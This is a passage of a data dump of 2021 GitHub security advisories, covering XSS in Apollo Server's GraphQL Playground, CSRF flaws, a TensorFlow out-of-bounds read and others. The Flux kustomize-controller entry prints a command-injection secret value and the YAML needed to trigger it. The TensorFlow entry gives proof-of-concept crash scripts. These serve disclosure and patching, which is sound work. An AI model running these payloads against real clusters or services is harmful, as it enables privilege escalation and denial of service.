'https://lists.debian.org/debian-lts-announce/2021/11/msg00019.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6BUWUF5VTENNP2ZYZBVFKPSUHLKLUBD5/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ACVT7M4YLZRLWWQ6SGRK3C6TOF4FXOXT/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MBAHHSGZLEJRCG4DX6J4RBWJAAWH55RQ/'}, {'type': 'WEB', 'url': 'https://saltproject.io/security_announcements/salt-security-advisory-2021-sep-02/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5011'}]","{'cwe_ids': ['CWE-668'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2022-07-05T22:05:39Z', 'nvd_published_at': '2021-09-08T15:15:00Z'}"
+1.4.0,GHSA-vfrc-ggmc-5jwv,2021-11-24T19:43:03Z,2021-11-23T17:55:46Z,,['CVE-2021-3950'],Cross-site Scripting in django-helpdesk,django-helpdesk is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'django-helpdesk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3950'}, {'type': 'WEB', 'url': 'https://github.com/django-helpdesk/django-helpdesk/commit/04483bdac3b5196737516398b5ce0383875a5c60'}, {'type': 'PACKAGE', 'url': 'https://github.com/django-helpdesk/django-helpdesk'}, {'type': 'WEB', 'url': 'https://github.com/django-helpdesk/django-helpdesk/releases/tag/0.3.2'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/4d7a5fdd-b2de-467a-ade0-3f2fb386638e'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T19:39:08Z', 'nvd_published_at': '2021-11-19T12:15:00Z'}"
+1.4.0,GHSA-qm7x-rc44-rrqw,2021-11-04T19:46:00Z,2021-11-08T18:07:42Z,,[],Cross-site Scripting Vulnerability in GraphQL Playground (distributed by Apollo Server),"### Impact
+In certain configurations, Apollo Server serves the client-side web app ""GraphQL Playground"" from the same web server that executes GraphQL operations. This web app has access to cookies and other credentials associated with the web server's operations. There is a cross-site scripting vulnerability in GraphQL Playground that allows for arbitrary JavaScript code execution in your web server's origin. If a user clicks a specially crafted link to your GraphQL Playground page served by Apollo Server, an attacker can steal cookies and other private browser data.
+
+Details of the underlying GraphQL Playground vulnerability are available in [this `graphql-playground` advisory](https://github.com/graphql/graphql-playground/security/advisories/GHSA-59r9-6jp6-jcm7). (A [similar vulnerability](https://github.com/graphql/graphiql/security/advisories/GHSA-x4r7-m2q9-69c8) exists in the related `graphiql` project.) This advisory focuses on identifying whether *Apollo Server* installations are vulnerable and mitigating the vulnerability in Apollo Server; see the other advisories for details on the XSS vulnerability itself.
+
+The impact of this vulnerability is more severe if (as is common) your GraphQL server's origin URL is an origin that is used to store sensitive data such as cookies.
+
+In order for this vulnerability to affect your Apollo Server installation, it must actually serve GraphQL Playground. The integration between Apollo Server and GraphQL Playground is different in Apollo Server 2 and Apollo Server 3. You can tell which version of Apollo Server you are running by looking at the version of the [package from which you import the `ApolloServer` class](https://www.apollographql.com/docs/apollo-server/integrations/middleware/): this may be `apollo-server`, `apollo-server-express`, `apollo-server-lambda`, etc.
+
+#### Apollo Server 3
+
+Apollo Server 3 does not serve GraphQL Playground by default. It has a [landing page plugin system](https://www.apollographql.com/docs/apollo-server/api/plugin/landing-pages/) and the default plugin is a simple splash page that is not vulnerable to this exploit, linking to Apollo Sandbox Explorer. (We chose to change the default because GraphQL Playground is not actively maintained.)
+
+If you are running Apollo Server 3, then you are *only* vulnerable if you *explicitly* import the [`ApolloServerPluginLandingPageGraphQLPlayground`](https://www.apollographql.com/docs/apollo-server/api/plugin/landing-pages/#graphql-playground-landing-page) plugin and pass it to your `ApolloServer`'s constructor in the `plugins` array. Otherwise, this advisory does not apply to your server.
+
+#### Apollo Server 2
+
+Apollo Server 2 serves GraphQL Playground by default, unless the `NODE_ENV` environment variable is set to `production`, or if you explicitly configure it via the `playground` option to the `ApolloServer` constructor.
+
+Your Apollo Server 2 installation is vulnerable if *any* of the following is true:
+- You pass `playground: true` to the `ApolloServer` constructor
+- You pass some other object like `playground: {title: ""Title""}` to the `ApolloServer` constructor
+- You do *not* pass any `playground` option to the `ApolloServer` constructor, *and* the `NODE_ENV` environment variable is *not* set to `production`
+
+#### Apollo Server 1
+
+Apollo Server 1 included `graphiql` instead of `graphql-playground`. `graphiql` isn't automatically enabled in Apollo Server 1: you have to explicitly call a function such as `graphiqlExpress` to enable it. Because Apollo Server 1 is not commonly used, we have not done a detailed examination of whether the integration between Apollo Server 1 and `graphiql` is vulnerable to a similar exploit. If you are still using Apollo Server 1, we recommend you disable `graphiql` by removing the `graphiqlExpress` call, and then upgrade to a newer version of Apollo Server.
+
+### Patches and workarounds
+
+There are several approaches you can take to ensure that your server is not vulnerable to this issue.
+
+#### Upgrade Apollo Server
+
+The vulnerability has been patched in Apollo Server 2.25.3 and Apollo Server 3.4.1. To get the patch, upgrade your [Apollo Server entry point package](https://www.apollographql.com/docs/apollo-server/integrations/middleware/) to one of the fixed versions; this package may be `apollo-server`, `apollo-server-express`, `apollo-server-lambda`, etc. Additionally, if you depend directly on `apollo-server-core` in your `package.json`, make sure that you upgrade it to the same version.
+
+#### Upgrade Playground version only
+
+If upgrading to the latest version of Apollo Server 2 or 3 quickly will be challenging, you can configure your current version of Apollo Server to serve the latest version of the GraphQL Playground app. This will pin your app to serve a specific version of GraphQL Playground and you will not receive updates to it when you upgrade Apollo Server later, but this may be acceptable because GraphQL Playground is not actively maintained.
+
+The way to do this depends on what version of Apollo Server you're using and if you're already configuring GraphQL Playground.
+
+- **Apollo Server 3**: If you are using Apollo Server 3, then you are only vulnerable if your serve explicitly calls [`ApolloServerPluginLandingPageGraphQLPlayground`](https://www.apollographql.com/docs/apollo-server/api/plugin/landing-pages/#graphql-playground-landing-page) and passes it to the Apollo Server constructor in the `plugins` array. Add the option `version: '1.7.42'` to this call, so it looks like:
+```
+plugins: [ApolloServerPluginLandingPageGraphQLPlayground({version: '1.7.42'})]
+```
+- **Apollo Server 2 with no explicit `playground` option**: If you are using Apollo Server 2 and do not currently pass the `playground` option to `new ApolloServer`, add a `playground` option like so:
+```
+new ApolloServer({ playground: process.env.NODE_ENV === 'production' ? false : { version: '1.7.42' } })
+```
+- **Apollo Server 2 with `playground: true` or `playground: {x, y, z}`**: If you are using Apollo Server 2 and currently pass `true` or an object to `new ApolloServer`, pass the `version` option under the `playground` option like so:
+```
+new ApolloServer({ playground: { version: '1.7.42', x, y, z } })
+```
+
+#### Disable GraphQL Playground
+
+If upgrading Apollo Server or GraphQL Playground is challenging, you can also disable GraphQL Playground.
+
+In Apollo Server 3, remove the call to `ApolloServerPluginLandingPageGraphQLPlayground` from your `ApolloServer` constructor's `plugins` array. This will replace GraphQL Playground with a simple splash page. See [the landing page plugins docs](https://www.apollographql.com/docs/apollo-server/api/plugin/landing-pages/) for details.
+
+In Apollo Server 2, add `playground: false` to your `ApolloServer` constructor: `new ApolloServer({ playground: false })`. This will replace GraphQL Playground with an attempt to execute a GraphQL operation, which will likely display an error in the browser.
+
+If you disable GraphQL Playground, any users who rely on it to execute GraphQL operations will need an alternative, such as the [Apollo Studio Explorer's account-free Sandbox](https://www.apollographql.com/docs/studio/explorer/#account-free-sandbox).
+
+### Credit
+
+This vulnerability was discovered by @Ry0taK. Thank you!
+
+The fix to GraphQL Playground was developed by @acao and @glasser with help from @imolorhe, @divyenduz, and @benjie.
+
+
+### For more information
+If you have any questions or comments about this advisory:
+* Read the [`graphql-playground` advisory](https://github.com/graphql/graphql-playground/security/advisories/GHSA-59r9-6jp6-jcm7)
+* Open an issue in [the `apollo-server` repo](https://github.com/apollographql/apollo-server/)
+* If the issue involves confidential information, email us at [security@apollographql.com](mailto:security@apollographql.com)
+",[],"[{'package': {'ecosystem': 'npm', 'name': 'apollo-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.25.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'apollo-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/apollographql/apollo-server/security/advisories/GHSA-qm7x-rc44-rrqw'}, {'type': 'PACKAGE', 'url': 'https://github.com/apollographql/apollo-server'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T19:46:00Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5629-8855-gf4g,2021-11-17T21:07:30Z,2021-11-18T20:12:40Z,,[],Authentication Bypass by CSRF Weakness ,"### Impact
+The actual vulnerability has been discovered on `solidus_auth_devise`. See [GHSA-xm34-v85h-9pg2](https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2) for details.
+
+The security advisory here exists to provide an extra layer of security in the form of a monkey patch for users who don't update `solidus_auth_devise`. For this reason, it has been marked as low impact on this end.
+
+### Patches
+For extra security, update `solidus_core` to versions `3.1.3`, `3.0.3` or `2.11.12`.
+
+### Workarounds
+Look at the workarounds described at [GHSA-xm34-v85h-9pg2](https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2).
+
+### References
+- [GHSA-xm34-v85h-9pg2](https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2).
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [solidus_auth_devise](https://github.com/solidusio/solidus_auth_devise/issues) or a discussion in [solidus](https://github.com/solidusio/solidus/discussions)
+* Email us at [security@solidus.io](mailto:security@soliidus.io)
+* Contact the core team on [Slack](http://slack.solidus.io/)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'solidus_core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.12'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'solidus_core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.3'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'solidus_core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '3.1.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/solidusio/solidus/security/advisories/GHSA-5629-8855-gf4g'}, {'type': 'WEB', 'url': 'https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2'}, {'type': 'PACKAGE', 'url': 'https://github.com/solidusio/solidus'}]","{'cwe_ids': ['CWE-305', 'CWE-352'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T21:07:30Z', 'nvd_published_at': None}"
+1.4.0,GHSA-q2cv-94xm-qvg4,2021-11-17T21:12:31Z,2021-11-15T23:18:00Z,,['CVE-2021-3921'],firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF),firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'grumpydictator/firefly-iii'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3921'}, {'type': 'WEB', 'url': 'https://github.com/firefly-iii/firefly-iii/commit/47fa9e39561a9ec9e210e4023d090a7b33381684'}, {'type': 'PACKAGE', 'url': 'https://github.com/firefly-iii/firefly-iii'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/724d3fd5-9f04-45c4-98d6-35a7d15468f5'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T21:06:10Z', 'nvd_published_at': '2021-11-13T09:15:00Z'}"
+1.4.0,GHSA-3v56-q6r6-4gcw,2021-11-08T21:04:44Z,2021-11-10T16:41:08Z,,['CVE-2021-41170'],Insecure Inherited Permissions in neoan3-apps/template,"### Impact
+Versions prior 1.1.1 have allowed for passing in closures directly into the template engine. As a result values that are callable are executed by the template engine. The issue arises if a value has the same name as a method or function in scope and can therefore be executed either by mistake or maliciously.
+
+In theory all users of the package are affected as long as they either deal with direct user input or database values. A multi-step attack on is therefore plausible.
+
+
+### Patches
+Version 1.1.1 has addressed this vulnerability.
+```php
+$params = [
+ 'reverse' => fn($input) => strrev($input), // <-- no longer possible with version ~1.1.1
+ 'value' => 'My website'
+]
+TemplateFunctions::registerClosure('reverse', fn($input) => strrev($input)); // <-- still possible (and nicely isolated)
+Template::embrace('{{reverse(value)}}
', $params);
+```
+
+### Workarounds
+Unfortunately only working with hardcoded values is safe in prior versions. As this likely defeats the purpose of a template engine, please upgrade.
+
+### References
+As a possible exploit is relatively easy to achieve, I will not share steps to reproduce the issue for now.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [our repo](https://github.com/sroehrl/neoan3-template)
+
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'neoan3-apps/template'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sroehrl/neoan3-template/security/advisories/GHSA-3v56-q6r6-4gcw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41170'}, {'type': 'WEB', 'url': 'https://github.com/sroehrl/neoan3-template/issues/8'}, {'type': 'WEB', 'url': 'https://github.com/sroehrl/neoan3-template/commit/4a2c9570f071d3c8f4ac790007599cba20e16934'}, {'type': 'PACKAGE', 'url': 'https://github.com/sroehrl/neoan3-template'}]","{'cwe_ids': ['CWE-277', 'CWE-732', 'CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:04:44Z', 'nvd_published_at': '2021-11-08T19:15:00Z'}"
+1.4.0,GHSA-35rf-v2jv-gfg7,2021-11-12T18:57:27Z,2021-11-15T17:35:33Z,,['CVE-2021-41254'],Privilege escalation to cluster admin on multi-tenant environments,"Users that can create Kubernetes Secrets, Service Accounts and Flux Kustomization objects, could execute commands inside the kustomize-controller container by embedding a shell script in a Kubernetes Secret. This can be used to run `kubectl` commands under the Service Account of kustomize-controller, thus allowing an authenticated Kubernetes user to gain cluster admin privileges.
+
+### Impact
+
+Multitenant environments where non-admin users have permissions to create Flux Kustomization objects are affected by this issue.
+
+### Exploit
+
+To exploit the command injection, first we create a secret with a shell command:
+
+```sh
+kubectl create secret generic exploit-token --from-literal=token="" || kubectl api-versions""
+```
+
+Then we create a Service Account that refers to the above Secret:
+
+```yaml
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+ name: exploit
+ namespace: default
+automountServiceAccountToken: false
+secrets:
+- name: exploit-token
+```
+
+And finally a Kustomization that runs under the above Service Account:
+
+```yaml
+apiVersion: kustomize.toolkit.fluxcd.io/v1beta1
+kind: Kustomization
+metadata:
+ name: exploit
+ namespace: default
+spec:
+ interval: 5m
+ path: ""./deploy/""
+ sourceRef:
+ kind: GitRepository
+ name: app
+ serviceAccountName: exploit
+```
+
+When kustomize-controller reconciles the above Kustomization, it will execute the shell command from the secret.
+
+### Patches
+
+This vulnerability was fixed in kustomize-controller v0.15.0 (included in flux2 v0.18.0) released on 2021-10-08. Starting with v0.15, the kustomize-controller no longer executes shell commands on the container OS and the `kubectl` binary has been removed from the container image.
+
+### Workarounds
+
+To prevent the creation of Kubernetes Service Accounts with `secrets` in namespaces owned by tenants, a Kubernetes validation webhook such as Gatekeeper OPA or Kyverno can be used.
+
+```yaml
+apiVersion: kyverno.io/v1
+kind: ClusterPolicy
+metadata:
+ name: restrict-sa
+spec:
+ validationFailureAction: enforce
+ background: false
+ rules:
+ - name: validate-sa
+ match:
+ resources:
+ kinds:
+ - ServiceAccount
+ namespaces:
+ - tenant1
+ - tenant2
+ subjects:
+ - kind: User
+ name: some@tenant1.com
+ - kind: User
+ name: some@tenant2.com
+ - kind: ServiceAccount
+ name: kustomize-controller
+ namespace: flux-system
+ - kind: ServiceAccount
+ name: helm-controller
+ namespace: flux-system
+ validate:
+ message: ""Invalid service account""
+ pattern:
+ X(secrets): ""*?""
+```
+
+### References
+
+Disclosed by ADA Logics in a security audit of the Flux project sponsored by CNCF and facilitated by OSTIF.
+
+### For more information
+
+If you have any questions or comments about this advisory:
+* Open an issue in [kustomize-controller repository](http://github.com/fluxcd/kustomize-controller)
+
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/fluxcd/kustomize-controller'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.15.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/fluxcd/kustomize-controller/security/advisories/GHSA-35rf-v2jv-gfg7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41254'}, {'type': 'PACKAGE', 'url': 'https://github.com/fluxcd/kustomize-controller'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-12T18:57:27Z', 'nvd_published_at': '2021-11-12T18:15:00Z'}"
+1.4.0,GHSA-3w5h-x4rh-hc28,2021-11-22T18:38:38Z,2021-11-23T18:18:25Z,,['CVE-2021-39231'],Exposure of sensitive information in Apache Ozone,"In Apache Ozone versions prior to 1.2.0, Various internal server-to-server RPC endpoints are available for connections, making it possible for an attacker to download raw data from Datanode and Ozone manager and modify Ratis replication configuration.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ozone:ozone-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39231'}, {'type': 'WEB', 'url': 'https://mail-archives.apache.org/mod_mbox/ozone-dev/202111.mbox/%3C110cd117-75ed-364b-cd38-3effd20f2183%40apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/19/2'}]","{'cwe_ids': ['CWE-668'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:38:38Z', 'nvd_published_at': '2021-11-19T10:15:00Z'}"
+1.4.0,GHSA-v935-pqmr-g8v9,2021-11-03T15:02:32Z,2021-11-03T17:36:04Z,,[],Unexpected panics in num-bigint,"### Impact
+
+Two scenarios were reported where `BigInt` and `BigUint` multiplication may unexpectedly panic.
+
+- The internal `mac3` function did not expect the possibility of non-empty all-zero inputs, leading to an `unwrap()` panic.
+- A buffer was allocated with less capacity than needed for an intermediate result, leading to an assertion panic.
+
+Rust panics can either cause stack unwinding or program abort, depending on the application configuration. In some settings, an unexpected panic may constitute a denial-of-service vulnerability.
+
+### Patches
+Both problems were introduced in version 0.4.1, and are fixed in version 0.4.3.
+
+### For more information
+If you have any questions or comments about this advisory, please open an issue in the [num-bigint](https://github.com/rust-num/num-bigint) repo.
+
+### Acknowledgements
+Thanks to Guido Vranken and Arvid Norberg for privately reporting these issues to the author.
+
+### References
+* [GHSA-v935-pqmr-g8v9](https://github.com/rust-num/num-bigint/security/advisories/GHSA-v935-pqmr-g8v9)
+* [num-bigint#228](https://github.com/rust-num/num-bigint/pull/228)
+",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'num-bigint'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.1'}, {'fixed': '0.4.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rust-num/num-bigint/security/advisories/GHSA-v935-pqmr-g8v9'}, {'type': 'WEB', 'url': 'https://github.com/rust-num/num-bigint/pull/228'}, {'type': 'PACKAGE', 'url': 'https://github.com/rust-num/num-bigint'}]","{'cwe_ids': ['CWE-131', 'CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-03T15:02:32Z', 'nvd_published_at': None}"
+1.4.0,GHSA-49rx-x2rw-pc6f,2021-11-08T22:43:35Z,2021-11-10T19:04:25Z,,['CVE-2021-41205'],Heap OOB read in all `tf.raw_ops.QuantizeAndDequantizeV*` ops,"### Impact
+The [shape inference functions for the `QuantizeAndDequantizeV*` operations](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/ops/array_ops.cc) can trigger a read outside of bounds of heap allocated array as illustrated in the following sets of PoCs:
+
+```python
+import tensorflow as tf
+
+@tf.function
+def test():
+ data=tf.raw_ops.QuantizeAndDequantizeV4Grad(
+ gradients=[1.0,1.0],
+ input=[1.0,1.0],
+ input_min=[1.0,10.0],
+ input_max=[1.0,10.0],
+ axis=-100)
+ return data
+
+test()
+```
+
+```python
+import tensorflow as tf
+
+@tf.function
+def test():
+ data=tf.raw_ops.QuantizeAndDequantizeV4(
+ input=[1.0,1.0],
+ input_min=[1.0,10.0],
+ input_max=[1.0,10.0],
+ signed_input=False,
+ num_bits=10,
+ range_given=False,
+ round_mode='HALF_TO_EVEN',
+ narrow_range=False,
+ axis=-100)
+ return data
+
+test()
+```
+
+```python
+import tensorflow as tf
+
+@tf.function
+def test():
+ data=tf.raw_ops.QuantizeAndDequantizeV3(
+ input=[1.0,1.0],
+ input_min=[1.0,10.0],
+ input_max=[1.0,10.0],
+ signed_input=False,
+ num_bits=10,
+ range_given=False,
+ narrow_range=False,
+ axis=-100)
+ return data
+
+test()
+```
+
+```python
+import tensorflow as tf
+
+@tf.function
+def test():
+ data=tf.raw_ops.QuantizeAndDequantizeV2(
+ input=[1.0,1.0],
+ input_min=[1.0,10.0],
+ input_max=[1.0,10.0],
+ signed_input=False,
+ num_bits=10,
+ range_given=False,
+ round_mode='HALF_TO_EVEN',
+ narrow_range=False,
+ axis=-100)
+ return data
+
+test()
+```
+
+In all of these cases, `axis` is a negative value different than the special value used for optional/unknown dimensions (i.e., -1). However, the code ignores the occurences of these values:
+
+```cc
+...
+if (axis != -1) {
+ ...
+ c->Dim(input, axis);
+ ...
+}
+```
+
+### Patches
+We have patched the issue in GitHub commit [7cf73a2274732c9d82af51c2bc2cf90d13cd7e6d](https://github.com/tensorflow/tensorflow/commit/7cf73a2274732c9d82af51c2bc2cf90d13cd7e6d).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-49rx-x2rw-pc6f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41205'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/7cf73a2274732c9d82af51c2bc2cf90d13cd7e6d'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:43:35Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}"
+1.4.0,GHSA-g3p2-hfqr-9m25,2023-06-30T20:31:40Z,2021-11-23T17:54:26Z,,['CVE-2021-22968'],Improper file handling in concrete5/core,"A bypass of adding remote files in Concrete CMS (previously concrete5) File Manager leads to remote code execution in Concrete CMS (concrete5) versions 8.5.6 and below. The external file upload feature stages files in the public directory even if they have disallowed file extensions. They are stored in a directory with a random name, but it's possible to stall the uploads and brute force the directory name. You have to be an admin with the ability to upload files, but this bug gives you the ability to upload restricted file types and execute them depending on server configuration. To fix this, a check for allowed file extensions was added before downloading files to a tmp directory","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'concrete5/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22968'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1350444'}, {'type': 'WEB', 'url': 'https://documentation.concretecms.org/developers/introduction/version-history/857-release-notes'}, {'type': 'PACKAGE', 'url': 'https://github.com/olsgreen/concrete5-core'}]","{'cwe_ids': ['CWE-330', 'CWE-98'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T19:41:50Z', 'nvd_published_at': '2021-11-19T19:15:00Z'}"
+1.4.0,GHSA-vcqg-3p29-xw73,2023-01-24T18:07:16Z,2021-11-03T18:04:41Z,,['CVE-2020-5310'],Integer overflow in Pillow,"libImaging/TiffDecode.c in Pillow before 6.2.2 has a TIFF decoding integer overflow, related to realloc.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5310'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/4e2def2539ec13e53a82e06c4b3daf00454100c4'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-db/blob/7872b0a91b4d980f749e6d75a81f8cc1af32829f/vulns/pillow/PYSEC-2020-81.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2MMU3WT2X64GS5WHDPKKC2WZA7UIIQ3A/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3DUMIBUYGJRAVJCTFUWBRLVQKOUTVX5P/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/6.2.2.html'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4272-1/'}]","{'cwe_ids': ['CWE-190'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-03T17:23:34Z', 'nvd_published_at': '2020-01-03T01:15:00Z'}"
